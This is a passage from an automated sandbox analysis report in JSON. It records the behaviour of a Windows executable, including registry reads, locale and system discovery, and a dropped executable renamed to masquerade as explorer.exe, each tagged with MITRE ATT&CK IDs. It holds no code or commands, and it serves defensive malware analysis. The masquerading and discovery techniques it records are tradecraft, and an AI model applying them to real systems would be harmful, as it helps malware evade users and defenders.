\"140015003c701c6b@ADVAPI32.dll\"\n \"1400150054701c6b@ADVAPI32.dll\"\n \"0c000d009c701c6b@ADVAPI32.dll\"\n \"0c000d00ac701c6b@ADVAPI32.dll\"\n \"0e000f00bc701c6b@ADVAPI32.dll\"\n \"0e000f00cc701c6b@ADVAPI32.dll\"\n \"0b000c00dc701c6b@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76E70000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"explorer.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"explorer.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"RCXCD0E.tmp\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"RCXCD0E.tmp\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c\" has an executable section named \".text\"\n \"explorer.exe\" has an executable section named \".text\"\n \"RCXCD0E.tmp\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c\" has an writable section named \".data\"\n \"explorer.exe\" has an writable section named \".data\"\n \"RCXCD0E.tmp\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c\" was detected as \"Borland Delphi 3.0 (???)\"\n \"explorer.exe\" was detected as \"Borland Delphi 3.0 (???)\"\n \"RCXCD0E.tmp\" was detected as \"Borland Delphi 3.0 (???)\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\VERSION.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\WTSAPI32.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\Program Files\\Windows NT\\explorer.exe\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\WTSAPI32.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\Program Files\\Windows NT\\EXPLORER.EXE\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\DWMAPI.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\CRYPTBASE.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" reads file \"c:\\f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" reads file \"c:\\program files\\windows nt\\explorer.exe\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" reads file \"c:\\windows\\fonts\\staticcache.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\VERSION.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\system32\\VERSION.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\WTSAPI32.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\system32\\WTSAPI32.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Program Files\\Windows NT\\explorer.exe\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Program Files\\Windows NT\\explorer.exe:Zone.Identifier\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to touch file \"C:\\Windows\\explorer.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-113", "type": 6, "relevance": 5, "name": "Touches files in program files directory", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" touched file \"C:\\Program Files\\Windows NT\\explorer.exe:Zone.Identifier\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" touched file \"C:\\Program Files\\Windows NT\\explorer.exe\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" touched file \"C:\\Program Files\\Windows NT\\RCXCD0E.tmp\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\Program Files\\Windows NT\\explorer.exe:Zone.Identifier\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" trying to access non-existent file \"C:\\Program Files\\Windows NT\\explorer.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" writes file \"c:\\program files\\windows nt\\explorer.exe\"\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" writes file \"c:\\program files\\windows nt\\rcxcd0e.tmp\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"F577D4931C05B204BFB3CB8459F8E0622BD0CB64F20DE4EB6DDD7AA166F60D5C\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")\n \"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"explorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%PROGRAMFILES%\\Windows NT\\explorer.exe]- [targetUID: 00000000-00005896]\n \"RCXCD0E.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%PROGRAMFILES%\\Windows NT\\RCXCD0E.tmp]- [targetUID: 00000000-00005896]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-53", "type": 8, "relevance": 1, "name": "Drops temp files", "description": "\"RCXCD0E.tmp\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\" - Location: [%PROGRAMFILES%\\Windows NT\\RCXCD0E.tmp]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" renamed original file\"C:\\Program Files\\Windows NT\\RCXCD0E.tmp\" to \"%PROGRAMFILES%\\Windows NT\\explorer.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005896)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005896)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"IsWow64Process\" with parameter \"5896\" - (UID: 00000000-00005896)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005896)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005896)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": 